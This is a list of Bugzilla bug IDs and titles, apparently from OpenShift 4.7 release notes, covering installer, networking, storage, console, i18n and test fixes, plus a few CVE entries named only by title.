1899515 - Passthrough credentials are not immediately re-distributed on update
1899575 - update discovery burst to reflect lots of CRDs on openshift clusters
1899582 - update discovery burst to reflect lots of CRDs on openshift clusters
1899588 - Operator objects are re-created after all other associated resources have been deleted
1899600 - Increased etcd fsync latency as of OCP 4.6
1899603 - workers-rhel7 CI jobs failing: Failed to remove rollback: error running rpm-ostree cleanup
1899627 - Project dashboard Active status using small icon
1899725 - Pods table does not wrap well with quick start sidebar open
1899746 - [ovn] error while waiting on flows for pod: OVS sandbox port is no longer active (probably due to a subsequent CNI ADD)
1899760 - etcd_request_duration_seconds_bucket metric has excessive cardinality
1899835 - catalog-operator repeatedly crashes with "runtime error: index out of range [0] with length 0"
1899839 - thanosRuler.resources.requests does not take effect in user-workload-monitoring-config confimap
1899853 - additionalSecurityGroupIDs not working for master nodes
1899922 - NP changes sometimes influence new pods.
1899949 - [Platform] Remove restriction on disk type selection for LocalVolumeSet
1900008 - Fix internationalized sentence fragments in ImageSearch.tsx
1900010 - Fix internationalized sentence fragments in BuildImageSelector.tsx
1900020 - Remove ' from internationalized keys
1900022 - Search Page - Top labels field is not applied to selected Pipeline resources
1900030 - disruption_tests: [sig-imageregistry] Image registry remain available failing consistently
1900126 - Creating a VM results in suggestion to create a default storage class when one already exists
1900138 - [OCP on RHV] Remove insecure mode from the installer
1900196 - stalld is not restarted after crash
1900239 - Skip "subPath should be able to unmount" NFS test
1900322 - metal3 pod's toleration for key: node-role.kubernetes.io/master currently matches on exact value matches but should match on Exists
1900377 - [e2e][automation] create new css selector for active users
1900496 - (release-4.7) Collect spec config for clusteroperator resources
1900672 - (s390x) Upgrade from old LUKS to new not working with DASD disks
1900699 - Impossible to add new Node on OCP 4.6 using large ECKD disks - fdasd issue
1900759 - include qemu-guest-agent by default
1900790 - Track all resource counts via telemetry
1900835 - Multus errors when cachefile is not found
1900935 - `oc adm release mirror` panic panic: runtime error
1900989 - accessing the route cannot wake up the idled resources
1901040 - When scaling down the status of the node is stuck on deleting
1901057 - authentication operator health check failed when installing a cluster behind proxy
1901107 - pod donut shows incorrect information
1901111 - Installer dependencies are broken
1901200 - linuxptp-daemon crash when enable debug log level
1901301 - CBO should handle platform=BM without provisioning CR
1901355 - [Azure][4.7] Invalid vm size from customized compute nodes does not fail properly
1901363 - High Podready Latency due to timed out waiting for annotations
1901373 - redundant bracket on snapshot restore button
1901376 - [on-prem] Upgrade from 4.6 to 4.7 failed with "timed out waiting for the condition during waitForControllerConfigToBeCompleted: controllerconfig is not completed: ControllerConfig has not completed: completed(false) running(false) failing(true"
1901395 - "Edit virtual machine template" action link should be removed
1901472 - [OSP] Bootstrap and master nodes use different keepalived unicast setting
1901517 - RHCOS 4.6.1 uses a single NetworkManager connection for multiple NICs when using default DHCP
1901531 - Console returns a blank page while trying to create an operator Custom CR with Invalid Schema
1901594 - Kubernetes resource CRUD operations.Kubernetes resource CRUD operations Pod "before all" hook for "creates the resource instance"
1901604 - CNO blocks editing Kuryr options
1901675 - [sig-network] multicast when using one of the plugins 'redhat/openshift-ovs-multitenant, redhat/openshift-ovs-networkpolicy' should allow multicast traffic in namespaces where it is enabled
1901909 - The device plugin pods / cni pod are restarted every 5 minutes
1901982 - [sig-builds][Feature:Builds] build can reference a cluster service with a build being created from new-build should be able to run a build that references a cluster service
1902019 - when podTopologySpreadConstraint strategy is enabled for descheduler it throws error
1902059 - Wire a real signer for service accout issuer
1902091 - `cluster-image-registry-operator` pod leaves connections open when fails connecting S3 storage
1902111 - CVE-2020-27813 golang-github-gorilla-websocket: integer overflow leads to denial of service
1902157 - The DaemonSet machine-api-termination-handler couldn't allocate Pod
1902253 - MHC status doesnt set RemediationsAllowed = 0
1902299 - Failed to mirror operator catalog - error: destination registry required
1902545 - Cinder csi driver node pod should add nodeSelector for Linux
1902546 - Cinder csi driver node pod doesn't run on master node
1902547 - Cinder csi driver controller pod doesn't run on master node
1902552 - Cinder csi driver does not use the downstream images
1902595 - Project workloads list view doesn't show alert icon and hover message
1902600 - Container csi-snapshotter in Cinder csi driver needs to use ImagePullPolicy=IfNotPresent
1902601 - Cinder csi driver pods run as BestEffort qosClass
1902653 - [BM][IPI] Master deployment failed: No valid host was found. Reason: No conductor service registered which supports driver redfish for conductor group
1902702 - [sig-auth][Feature:LDAP][Serial] ldap group sync can sync groups from ldap: oc cp over non-existing directory/file fails
1902746 - [BM][IP] Master deployment failed - Base.1.0.GeneralError: database is locked
1902824 - failed to generate semver informed package manifest: unable to determine default channel
1902894 - hybrid-overlay-node crashing trying to get node object during initialization
1902969 - Cannot load vmi detail page
1902981 - It should default to current namespace when create vm from template
1902996 - [AWS] UPI on USGov, bootstrap machine can not fetch ignition file via s3:// URI
1903033 - duplicated lines of imageContentSources is seen when mirror release image to local registry
1903034 - OLM continuously printing debug logs
1903062 - [Cinder csi driver] Deployment mounted volume have no write access
1903078 - Deleting VolumeSnapshotClass makes VolumeSnapshot not Ready
1903107 - Enable vsphere-problem-detector e2e tests
1903164 - OpenShift YAML editor jumps to top every few seconds
1903165 - Improve Canary Status Condition handling for e2e tests
1903172 - Column Management: Fix sticky footer on scroll
1903186 - [Descheduler] cluster logs should report some info when PodTopologySpreadConstraints strategy is enabled
1903188 - [Descheduler] cluster log reports failed to validate server configuration" err="unsupported log format:
1903192 - Role name missing on create role binding form
1903196 - Popover positioning is misaligned for Overview Dashboard status items
1903206 - Ingress controller incorrectly routes traffic to non-ready pods/backends.
1903226 - MutatingWebhookConfiguration pod-identity-webhook does not exclude critical control-plane components
1903248 - Backport Upstream Static Pod UID patch
1903277 - Deprovisioning Not Deleting Security Groups [VpcLimitExceeded on e2e-aws tests]
1903290 - Kubelet repeatedly log the same log line from exited containers
1903346 - PV backed by FC lun is not being unmounted properly and this leads to IO errors / xfs corruption.
1903382 - Panic when task-graph is canceled with a TaskNode with no tasks
1903400 - Migrate a VM which is not running goes to pending state
1903402 - Nic/Disk on VMI overview should link to VMI's nic/disk page
1903414 - NodePort is not working when configuring an egress IP address
1903424 - mapi_machine_phase_transition_seconds_sum doesn't work
1903464 - "Evaluating rule failed" for "record: cluster:kube_persistentvolumeclaim_resource_requests_storage_bytes:provisioner:sum" and "record: cluster:kubelet_volume_stats_used_bytes:provisioner:sum"
1903639 - Hostsubnet gatherer produces wrong output
1903651 - Network Policies are not working as expected with OVN-Kubernetes when traffic hairpins back to the same source through a service
1903660 - Cannot install with Assisted Installer on top of IPv6 since network provider is not started
1903674 - [sig-apps] ReplicationController should serve a basic image on each replica with a private image
1903717 - Handle different Pod selectors for metal3 Deployment
1903733 - Scale up followed by scale down can delete all running workers
1903917 - Failed to load "Developer Catalog" page
1903999 - Httplog response code is always zero
1904026 - The quota controllers should resync on new resources and make progress
1904064 - Automated cleaning is disabled by default
1904124 - DHCP to static lease script doesn't work correctly if starting with infinite leases
1904125 - Boostrap VM .ign image gets added into 'default' pool instead of <cluster-name>-<id>-bootstrap
1904131 - kuryr tempest plugin test test_ipblock_network_policy_sg_rules fails
1904133 - KubeletConfig flooded with failure conditions
1904161 - AlertmanagerReceiversNotConfigured fires unconditionally on alertmanager restart
1904243 - RHCOS 4.6.1 missing ISCSI initiatorname.iscsi !
1904244 - MissingKey errors for two plugins using i18next.t
1904262 - clusterresourceoverride-operator has version: 1.0.0 every build
1904296 - VPA-operator has version: 1.0.0 every build
1904297 - The index image generated by "opm index prune" leaves unrelated images
1904305 - Should have scroll-down bar for the field which the values list has too many results under dashboards
1904385 - [oVirt] registry cannot mount volume on 4.6.4 -> 4.6.6 upgrade
1904497 - vsphere-problem-detector: Run on vSphere cloud only
1904501 - [Descheduler] descheduler does not evict any pod when PodTopologySpreadConstraint strategy is set
1904502 - vsphere-problem-detector: allow longer timeouts for some operations
1904503 - vsphere-problem-detector: emit alerts
1904538 - [sig-arch][Early] Managed cluster should start all core operators: monitoring: container has runAsNonRoot and image has non-numeric user (nobody)
1904578 - metric scraping for vsphere problem detector is not configured
1904582 - All application traffic broken due to unexpected load balancer change on 4.6.4 -> 4.6.6 upgrade
1904663 - IPI pointer customization MachineConfig always generated
1904679 - [Feature:ImageInfo] Image info should display information about images
1904683 - `[sig-builds][Feature:Builds] s2i build with a root user image` tests use docker.io image
1904684 - [sig-cli] oc debug ensure it works with image streams
1904713 - Helm charts with kubeVersion restriction are filtered incorrectly
1904776 - Snapshot modal alert is not pluralized
1904824 - Set vSphere hostname from guestinfo before NM starts
1904941 - Insights status is always showing a loading icon
1904973 - KeyError: 'nodeName' on NP deletion
1904985 - Prometheus and thanos sidecar targets are down
1904993 - Many ampersand special characters are found in strings
1905066 - QE - Monitoring test cases - smoke test suite automation
1905074 - QE -Gherkin linter to maintain standards
1905100 - Too many haproxy processes in default-router pod causing high load average
1905104 - Snapshot modal disk items missing keys
1905115 - CI: dev-scripts fail on 02_configure_host: Failed to start network ostestbm
1905119 - Race in AWS EBS determining whether custom CA bundle is used
1905128 - [e2e][automation] e2e tests succeed without actually execute
1905133 - operator conditions special-resource-operator
1905141 - vsphere-problem-detector: report metrics through telemetry
1905146 - Backend Tests: TestHelmRepoGetter_SkipDisabled failures
1905194 - Detecting broken connections to the Kube API takes up to 15 minutes
1905221 - CVO transitions from "Initializing" to "Updating" despite not attempting many manifests
1905232 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them failing due to inconsistent images between CI and OCP
1905253 - Inaccurate text at bottom of Events page
1905298 - openshift-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory
1905299 - OLM fails to update operator
1905307 - Provisioning CR is missing from must-gather
1905319 - cluster-samples-operator containers are not requesting required memory resource
1905320 - csi-snapshot-webhook is not requesting required memory resource
1905323 - dns-operator is not requesting required memory resource
1905324 - ingress-operator is not requesting required memory resource
1905327 - openshift-kube-scheduler initContainer wait-for-host-port is not requesting required resources: cpu, memory
1905328 - Changing the bound token service account issuer invalids previously issued bound tokens
1905329 - openshift-oauth-apiserver initContainer fix-audit-permissions is not requesting required resources: cpu, memory
1905330 - openshift-monitoring init-textfile is not requesting required resources: cpu, memory
1905338 - QE -Cypress Automation for Add Flow - Database, Yaml, OperatorBacked, PageDetails
1905347 - QE - Design Gherkin Scenarios
1905348 - QE - Design Gherkin Scenarios
1905362 - [sriov] Error message 'Fail to update DaemonSet' always shown in sriov operator pod
1905368 - [sriov] net-attach-def generated from sriovnetwork cannot be restored once it was deleted
1905370 - A-Z/Z-A sorting dropdown on Developer Catalog page is not aligned with filter text input
1905380 - Default to Red Hat/KubeVirt provider if common template does not have provider annotation
1905393 - CMO uses rbac.authorization.k8s.io/v1beta1 instead of rbac.authorization.k8s.io/v1
1905404 - The example of "Remove the entrypoint on the mysql:latest image" for `oc image append` does not work
1905416 - Hyperlink not working from Operator Description
1905430 - usbguard extension fails to install because of missing correct protobuf dependency version
1905492 - The stalld service has a higher scheduler priority than ksoftirq and rcu{b, c} threads
1905502 - Test flake - unable to get https transport for ephemeral-registry
1905542 - [GSS] The "External" mode option is not available when the OCP cluster is deployed using Redhat Cluster Assisted Installer 4.6.
1905599 - Errant change to lastupdatetime in copied CSV status can trigger runaway csv syncs
1905610 - Fix typo in export script
1905621 - Protractor login test fails against a 4.7 (nightly) Power cluster
1905640 - Subscription manual approval test is flaky
1905647 - Report physical core valid-for-subscription min/max/cumulative use to telemetry
1905696 - ClusterMoreUpdatesModal component did not get internationalized
1905748 - with sharded ingresscontrollers, all shards reload when any endpoint changes
1905761 - NetworkPolicy with Egress policyType is resulting in SDN errors and improper communication within Project
1905778 - inconsistent ingresscontroller between fresh installed cluster and upgraded cluster
1905792 - [OVN]Cannot create egressfirewalll with dnsName
1905889 - Should create SA for each namespace that the operator scoped
1905920 - Quickstart exit and restart
1905941 - Page goes to error after create catalogsource
1905977 - QE ghaekin design scenaio-pipeline metrics ODC-3711
1906032 - Canary Controller: Canary daemonset rolls out slowly in large clusters
1906100 - Disconnected cluster upgrades are failing from the cli, when signature retrieval is being blackholed instead of quickly rejected
1906105 - CBO annotates an existing Metal3 deployment resource to indicate that it is managing it
1906118 - OCS feature detection constantly polls storageclusters and storageclasses
1906120 - 'Create Role Binding' form not setting user or group value when created from a user or group resource
1906121 - [oc] After new-project creation, the kubeconfig file does not set the project
1906134 - OLM should not create OperatorConditions for copied CSVs
1906143 - CBO supports log levels
1906186 - i18n: Translators are not able to translate `this` without context for alert manager config
1906228 - tuned and openshift-tuned sometimes do not terminate gracefully, slowing reboots
1906274 - StorageClass installed by Cinder csi driver operator should enable the allowVolumeExpansion to support volume resize.
1906276 - `oc image append` can't work with multi-arch image with --filter-by-os='.*'
1906318 - use proper term for Authorized SSH Keys
1906335 - The lastTransitionTime, message, reason field of operatorcondition should be optional
1906356 - Unify Clone PVC boot source flow with URL/Container boot source
1906397 - IPA has incorrect kernel command line arguments
1906441 - HorizontalNav and NavBar have invalid keys
1906448 - Deploy using virtualmedia with provisioning network disabled fails - 'Failed to connect to the agent' in ironic-conductor log
1906459 - openstack: Quota Validation fails if unlimited quotas are given to a project
1906496 - [BUG] Thanos having possible memory leak consuming huge amounts of node's memory and killing them
1906508 - TestHeaderNameCaseAdjust outputs nil error message on some failures
1906511 - Root reprovisioning tests flaking often in CI
1906517 - Validation is not robust enough and may prevent to generate install-confing.
1906518 - Update snapshot API CRDs to v1
1906519 - Update LSO CRDs to use v1
1906570 - Number of disruptions caused by reboots on a cluster cannot be measured
1906588 - [ci][sig-builds] nodes is forbidden: User "e2e-test-jenkins-pipeline-xfghs-user" cannot list resource "nodes" in API group "" at the cluster scope
1906650 - Cannot collect network policy, EgressFirewall, egressip logs with gather_network_logs
1906655 - [SDN]Cannot colloect ovsdb-server.log and ovs-vswitchd.log with gather_network_logs
1906679 - quick start panel styles are not loaded
1906683 - Kn resources are not showing in Topology if triggers has KSVC and IMC as subscriber
1906684 - Event Source creation fails if user selects no app group and switch to yaml and then to form
1906685 - SinkBinding is shown in topology view if underlying resource along with actual source created
1906689 - user can pin to nav configmaps and secrets multiple times
1906691 - Add doc which describes disabling helm chart repository
1906713 - Quick starts not accesible for a developer user
1906718 - helm chart "provided by Redhat" is misspelled
1906732 - Machine API proxy support should be tested
1906745 - Update Helm endpoints to use Helm 3.4.x
1906760 - performance issues with topology constantly re-rendering
1906766 - localized `Autoscaled` & `Autoscaling` pod texts overlap with the pod ring
1906768 - Virtualization nav item is incorrectly placed in the Admin Workloads section
1906769 - topology fails to load with non-kubeadmin user
1906770 - shortcuts on mobiles view occupies a lot of space
1906798 - Dev catalog customization doesn't update console-config ConfigMap
1906806 - Allow installing extra packages in ironic container images
1906808 - [test-disabled] ServiceAccounts should support OIDC discovery of service account issuer
1906835 - Topology view shows add page before then showing full project workloads
1906840 - ClusterOperator should not have status "Updating" if operator version is the same as the release version
1906844 - EndpointSlice and EndpointSliceProxying feature gates should be disabled for openshift-sdn kube-proxy
1906860 - Bump kube dependencies to v1.20 for Net Edge components
1906864 - Quick Starts Tour: Need to adjust vertical spacing
1906866 - Translations of Sample-Utils
1906871 - White screen when sort by name in monitoring alerts page
1906872 - Pipeline Tech Preview Badge Alignment
1906875 - Provide an option to force backup even when API is not available.
1906877 - Placeholder' value in search filter do not match column heading in Vulnerabilities
1906879 - Add missing i18n keys
1906880 - oidcdiscoveryendpoint controller invalidates all TokenRequest API tokens during install
1906896 - No Alerts causes odd empty Table (Need no content message)
1906898 - Missing User RoleBindings in the Project Access Web UI
1906899 - Quick Start - Highlight Bounding Box Issue
1906916 - Teach CVO about flowcontrol.apiserver.k8s.io/v1beta1
1906933 - Cluster Autoscaler should have improved mechanisms for group identifiers
1906935 - Delete resources when Provisioning CR is deleted
1906968 - Must-gather should support collecting kubernetes-nmstate resources
1906986 - Ensure failed pod adds are retried even if the pod object doesn't change
1907199 - Need to upgrade machine-api-operator module version under cluster-api-provider-kubevirt
1907202 - configs.imageregistry.operator.openshift.io cluster does not update its status fields after URL change
1907211 - beta promotion of p&f switched storage version to v1beta1, making downgrades impossible.
1907269 - Tooltips data are different when checking stack or not checking stack for the same time
1907280 - Install tour of OCS not available.
1907282 - Topology page breaks with white screen
1907286 - The default mhc machine-api-termination-handler couldn't watch spot instance
1907287 - [csi-snapshot-webhook] should support both v1beta1 and v1 version when creating volumesnapshot/volumesnapshotcontent
1907293 - Increase timeouts in e2e tests
1907295 - Gherkin script for improve management for helm
1907299 - Advanced Subscription Badge for KMS and Arbiter not present
1907303 - Align VM template list items by baseline
1907304 - Use PF styles for selected template card in VM Wizard
1907305 - Drop 'ISO' from CDROM boot source message
1907307 - Support and provider labels should be passed on between templates and sources
1907310 - Pin action should be renamed to favorite
1907312 - VM Template source popover is missing info about added date
1907313 - ClusterOperator objects cannot be overriden with cvo-overrides
1907328 - iproute-tc package is missing in ovn-kube image
1907329 - CLUSTER_PROFILE env. variable is not used by the CVO
1907333 - Node stuck in degraded state, mcp reports "Failed to remove rollback: error running rpm-ostree cleanup -r: error: Timeout was reached"
1907373 - Rebase to kube 1.20.0
1907375 - Bump to latest available 1.20.x k8s - workloads team
1907378 - Gather netnamespaces networking info
1907380 - kube-rbac-proxy exposes tokens, has excessive verbosity
1907381 - OLM fails to deploy an operator if its deployment template contains a description annotation that doesn't match the CSV one
1907390 - prometheus-adapter: panic after k8s 1.20 bump
1907399 - build log icon link on topology nodes cause app to reload
1907407 - Buildah version not accessible
1907421 - [4.6.1]oc-image-mirror command failed on "error: unable to copy layer"
1907453 - Dev Perspective -> running vm details -> resources -> no data
1907454 - Install PodConnectivityCheck CRD with CNO
1907459 - "The Boot source is also maintained by Red Hat." is always shown for all boot sources
1907475 - Unable to estimate the error rate of ingress across the connected fleet
1907480 - `Active alerts` section throwing forbidden error for users.
1907518 - Kamelets/Eventsource should be shown to user if they have create access
1907543 - Korean timestamps are shown when users' language preferences are set to German-en-en-US
1907610 - Update kubernetes deps to 1.20
1907612 - Update kubernetes deps to 1.20
1907621 - openshift/installer: bump cluster-api-provider-kubevirt version
1907628 - Installer does not set primary subnet consistently
1907632 - Operator Registry should update its kubernetes dependencies to 1.20
1907639 - pass dual-stack node IPs to kubelet in dual-stack clusters
1907644 - fix up handling of non-critical annotations on daemonsets/deployments
1907660 - Pod list does not render cell height correctly when pod names are too long (dynamic table rerendering issue?)
1907670 - CVE-2020-27846 crewjam/saml: authentication bypass in saml authentication
1907671 - Ingress VIP assigned to two infra nodes simultaneously - keepalived process running in pods seems to fail
1907767 - [e2e][automation]update test suite for kubevirt plugin
1907770 - Recent RHCOS 47.83 builds (from rhcos-47.83.202012072210-0 on) don't allow master and worker nodes to boot
1907792 - The `overrides` of the OperatorCondition cannot block the operator upgrade
1907793 - Surface support info in VM template details
1907812 - 4.7 to 4.6 downgrade stuck in clusteroperator storage
1907822 - [OCP on OSP] openshift-install panic when checking quota with install-config have no flavor set
1907863 - Quickstarts status not updating when starting the tour
1907872 - dual stack with an ipv6 network fails on bootstrap phase
1907874 - QE - Design Gherkin Scenarios for epic ODC-5057
1907875 - No response when try to expand pvc with an invalid size
1907876 - Refactoring record package to make gatherer configurable
1907877 - QE - Automation- pipelines builder scripts
1907883 - Fix Pipleine creation without namespace issue
1907888 - Fix pipeline list page loader
1907890 - Misleading and incomplete alert message shown in pipeline-parameters and pipeline-resources form
1907892 - Unable to edit application deployed using "From Devfile" option
1907893 - navSortUtils.spec.ts unit test failure
1907896 - When a workload is added, Topology does not place the new items well
1907908 - VM Wizard always uses VirtIO for the VM rootdisk regardless what is defined in common-template
1907924 - Enable madvdontneed in OpenShift Images
1907929 - Enable madvdontneed in OpenShift System Components Part 2
1907936 - NTO is not reporting nto_profile_set_total metrics correctly after reboot
1907947 - The kubeconfig saved in tenantcluster shouldn't include anything that is not related to the current context
1907948 - OCM-O bump to k8s 1.20
1907952 - bump to k8s 1.20
1907972 - Update OCM link to open Insights tab
1907989 - DataVolumes was intorduced in common templates - VM creation fails in the UI
1907998 - Gather kube_pod_resource_request/limit metrics as exposed in upstream KEP 1916
1908001 - [CVE-2020-10749] Update github.com/containernetworking/plugins to v.0.8.6 in egress-router-cni
1908014 - e2e-aws-ansible and e2e-aws-helm are broken in ocp-release-operator-sdk
1908035 - dynamic-demo-plugin build does not generate dist directory
1908135 - quick search modal is not centered over topology
1908145 - kube-scheduler-recovery-controller container crash loop when router pod is co-scheduled
1908159 - [AWS C2S] MCO fails to sync cloud config
1908171 - GCP: Installation fails when installing cluster with n1-custom-4-16384custom type (n1-custom-4-16384)
1908180 - Add source for template is stucking in preparing pvc
1908217 - CI: Server-Side Apply should work for oauth.openshift.io/v1: has no tokens
1908231 - [Migration] The pods ovnkube-node are in CrashLoopBackOff after SDN to OVN
1908277 - QE - Automation- pipelines actions scripts
1908280 - Documentation describing `ignore-volume-az` is incorrect
1908296 - Fix pipeline builder form yaml switcher validation issue
1908303 - [CVE-2020-28367 CVE-2020-28366] Remove CGO flag from rhel Dockerfile in Egress-Router-CNI
1908323 - Create button missing for PLR in the search page
1908342 - The new pv_collector_total_pv_count is not reported via telemetry
1908344 - [vsphere-problem-detector] CheckNodeProviderID and CheckNodeDiskUUID have the same name
1908347 - CVO overwrites ValidatingWebhookConfiguration for snapshots
1908349 - Volume snapshot tests are failing after 1.20 rebase
1908353 - QE - Automation- pipelines runs scripts
1908361 - bump to k8s 1.20
1908367 - QE - Automation- pipelines triggers scripts
1908370 - QE - Automation- pipelines secrets scripts
1908375 - QE - Automation- pipelines workspaces scripts
1908381 - Go Dependency Fixes for Devfile Lib
1908389 - Loadbalancer Sync failing on Azure
1908400 - Tests-e2e, increase timeouts, re-add TestArchiveUploadedAndResultsReceived
1908407 - Backport Upstream 95269 to fix potential crash in kubelet
1908410 - Exclude Yarn from VSCode search
1908425 - Create Role Binding form subject type and name are undefined when All Project is selected
1908431 - When the marketplace-operator pod get's restarted, the custom catalogsources are gone, as well as the pods
1908434 - Remove &apos from metal3-plugin internationalized strings
1908437 - Operator backed with no icon has no badge associated with the CSV tag
1908459 - bump to k8s 1.20
1908461 - Add bugzilla component to OWNERS file
1908462 - RHCOS 4.6 ostree removed dhclient
1908466 - CAPO AZ Screening/Validating
1908467 - Zoom in and zoom out in topology package should be sentence case
1908468 - [Azure][4.7] Installer can't properly parse instance type with non integer memory size
1908469 - nbdb failed to come up while bringing up OVNKubernetes cluster
1908471 - OLM should bump k8s dependencies to 1.20
1908484 - oc adm release extract --cloud=aws --credentials-requests dumps all manifests
1908493 - 4.7-e2e-metal-ipi-ovn-dualstack intermittent test failures, worker hostname is overwritten by NM
1908545 - VM clone dialog does not open
1908557 - [e2e][automation]Miss css id on bootsource and reviewcreate step on wizard
1908562 - Pod readiness is not being observed in real world cases
1908565 - [4.6] Cannot filter the platform/arch of the index image
1908573 - Align the style of flavor
1908583 - bootstrap does not run on additional networks if configured for master in install-config
1908596 - Race condition on operator installation
1908598 - Persistent Dashboard shows events for all provisioners
1908641 - Go back to Catalog Page link on Virtual Machine page vanishes on empty state
1908648 - Skip TestKernelType test on OKD, adjust TestExtensions
1908650 - The title of customize wizard is inconsistent
1908654 - cluster-api-provider: volumes and disks names shouldn't change by machine-api-operator
1908675 - Reenable [sig-storage] CSI mock volume CSI FSGroupPolicy [LinuxOnly] should modify fsGroup if fsGroupPolicy=default [Suite:openshift/conformance/parallel] [Suite:k8s]
1908687 - Option to save user settings separate when using local bridge (affects console developers only)
1908697 - Show `kubectl diff ` command in the oc diff help page
1908715 - Pressing the arrow up key when on topmost quick-search list item it should loop back to bottom
1908716 - UI breaks on click of sidebar of ksvc (if revisions not up) in topology on 4.7 builds
1908717 - "missing unit character in duration" error in some network dashboards
1908746 - [Safari] Drop Shadow doesn't works as expected on hover on workload
1908747 - stale S3 CredentialsRequest in CCO manifest
1908758 - AWS: NLB timeout value is rejected by AWS cloud provider after 1.20 rebase
1908830 - RHCOS 4.6 - Missing Initiatorname
1908868 - Update empty state message for EventSources and Channels tab
1908880 - 4.7 aws-serial CI: NoExecuteTaintManager Single Pod [Serial] eventually evict pod with finite tolerations from tainted nodes
1908883 - CVE-2020-29652 golang: crypto/ssh: crafted authentication request can lead to nil pointer dereference
1908888 - Dualstack does not work with multiple gateways
1908889 - Bump CNO to k8s 1.20
1908891 - TestDNSForwarding DNS operator e2e test is failing frequently
1908914 - CNO: upgrade nodes before masters
1908918 - Pipeline builder yaml view sidebar is not responsive
1908960 - QE - Design Gherkin Scenarios
1908971 - Gherkin Script for pipeline debt 4.7
1908983 - i18n: Add Horizontal Pod Autoscaler action menu is not translated
1908997 - Unsupported access mode should not be available when creating pvc by cinder-csi-driver/gcp-pd-csi-driver from web-console
1908998 - [cinder-csi-driver] doesn't detect the credentials change
1909004 - "No datapoints found" for RHEL node's filesystem graph
1909005 - i18n: workloads list view heading is not translated
1909012 - csi snapshot webhook does not block any invalid update for volumesnapshot and volumesnapshotcontent objects
1909027 - Disks option of Sectected capacity chart shows HDD disk even on selection of SDD disk type
1909043 - OCP + OCS 4.7 Internal - Storage cluster creation throws warning when zone=0 in VMware
1909067 - Web terminal should keep latest output when connection closes
1909070 - PLR and TR Logs component is not streaming as fast as tkn
1909092 - Error Message should not confuse user on Channel form
1909096 - OCP 4.7+OCS 4.7 - The Requested Cluster Capacity field needs to include the selected capacity in calculation in Review and Create Page
1909108 - Machine API components should use 1.20 dependencies
1909116 - Catalog Sort Items dropdown is not aligned on Firefox
1909198 - Move Sink action option is not working
1909207 - Accessibility Issue on monitoring page
1909236 - Remove pinned icon overlap on resource name
1909249 - Intermittent packet drop from pod to pod
1909276 - Accessibility Issue on create project modal
1909289 - oc debug of an init container no longer works
1909290 - Logging may be broken due to mix of k8s.io/klog v1 and v2
1909358 - registry.redhat.io/redhat/community-operator-index:latest only have hyperfoil-bundle
1909453 - Boot disk RAID can corrupt ESP if UEFI firmware writes to it
1909455 - Boot disk RAID will not boot if the primary disk enumerates but fails I/O
1909464 - Build operator-registry with golang-1.15
1909502 - NO_PROXY is not matched between bootstrap and global cluster setting which lead to desired master machineconfig is not found
1909521 - Add kubevirt cluster type for e2e-test workflow
1909527 - [IPI Baremetal] After upgrade from 4.6 to 4.7 metal3 pod does not get created
1909587 - [OCP4] all of the OCP master nodes with soft-anti-affinity run on the same OSP node
1909610 - Fix available capacity when no storage class selected
1909678 - scale up / down buttons available on pod details side panel
1909723 - cluster-api-provider-openstack: Update ose-openstack-machine-controllers builder & base images to be consistent with ART
1909730 - unbound variable error if EXTRA_PKGS_LIST is not defined
1909739 - Arbiter request data changes
1909744 - cluster-api-provider-openstack: Bump gophercloud
1909790 - PipelineBuilder yaml view cannot be used for editing a pipeline
1909791 - Update standalone kube-proxy config for EndpointSlice
1909792 - Empty states for some details page subcomponents are not i18ned
1909815 - Perspective switcher is only half-i18ned
1909821 - OCS 4.7 LSO installation blocked because of Error "Invalid value: "integer": spec.flexibleScaling in body
1909836 - operator-install-global Cypress test was failing in OLM as it depends on an operator that isn't installed in CI
1909864 - promote-release-openshift-machine-os-content-e2e-aws-4.5 is perm failing
1909911 - [OVN]EgressFirewall caused a segfault
1909943 - Upgrade from 4.6 to 4.7 stuck due to write /sys/devices/xxxx/block/sda/queue/scheduler: invalid argument
1909958 - Support Quick Start Highlights Properly
1909978 - ignore-volume-az = yes not working on standard storageClass
1909981 - Improve statement in template select step
1909992 - Fail to pull the bundle image when using the private index image
1910024 - Reload issue in latest(4.7) UI code on 4.6 cluster locally in dev
1910036 - QE - Design Gherkin Scenarios ODC-4504
1910049 - UPI: ansible-galaxy is not supported
1910127 - [UPI on oVirt]: Improve UPI Documentation
1910140 - fix the api dashboard with changes in upstream kube 1.20
1910160 - If two OperatorConditions include the same deployments they will keep updating the deployment's containers with the OPERATOR_CONDITION_NAME Environment Variable
1910165 - DHCP to static lease script doesn't handle multiple addresses
1910305 - [Descheduler] - The minKubeVersion should be 1.20.0
1910409 - Notification drawer is not localized for i18n
1910459 - Could not provision gcp volume if delete secret gcp-pd-cloud-credentials
1910492 - KMS details are auto-populated on the screen in next attempt at Storage cluster creation
1910501 - Installed Operators->Operand required: Clicking on cancel in Storage cluster page takes back to the Install Operator page
1910533 - [OVN] It takes about 5 minutes for EgressIP failover to work
1910581 - library-go: proxy ENV is not injected into csi-driver-controller which lead to storage operator never get ready
1910666 - Creating a Source Secret from type SSH-Key should use monospace font for better usability
1910738 - OCP 4.7 Installation fails on VMWare due to 1 worker that is degraded
1910739 - Redfish-virtualmedia (idrac) deploy fails on "The Virtual Media image server is already connected"
1910753 - Support Directory Path to Devfile
1910805 - Missing translation for Pipeline status and breadcrumb text
1910829 - Cannot delete a PVC if the dv's phase is WaitForFirstConsumer
1910840 - Show Nonexistent command info in the `oc rollback -h` help page
1910859 - breadcrumbs doesn't use last namespace
1910866 - Unify templates string
1910870 - Unify template dropdown action
1911016 - Prometheus unable to mount NFS volumes after upgrading to 4.6
1911129 - Monitoring charts renders nothing when switching from a Deployment to "All workloads"
1911176 - [MSTR-998] Wrong text shown when hovering on lines of charts in API Performance dashboard
1911212 - [MSTR-998] API Performance Dashboard "Period" drop-down has a choice "$__auto_interval_period" which can bring "1:154: parse error: missing unit character in duration"
1911213 - Wrong and misleading warning for VMs that were created manually (not from template)
1911257 - [aws-c2s] failed to create cluster, kube-cloud-config was not created
1911269 - waiting for the build message present when build exists
1911280 - Builder images are not detected for Dotnet, Httpd, NGINX
1911307 - Pod Scale-up requires extra privileges in OpenShift web-console
1911381 - "Select Persistent Volume Claim project" shows in customize wizard when select a source available template
1911382 - "source volumeMode (Block) and target volumeMode (Filesystem) do not match" shows in VM Error
1911387 - Hit error - "Cannot read property 'value' of undefined" while creating VM from template
1911408 - [e2e][automation] Add auto-clone cli tests and new flow of VM creation
1911418 - [v2v] The target storage class name is not displayed if default storage class is used
1911434 - git ops empty state page displays icon with watermark
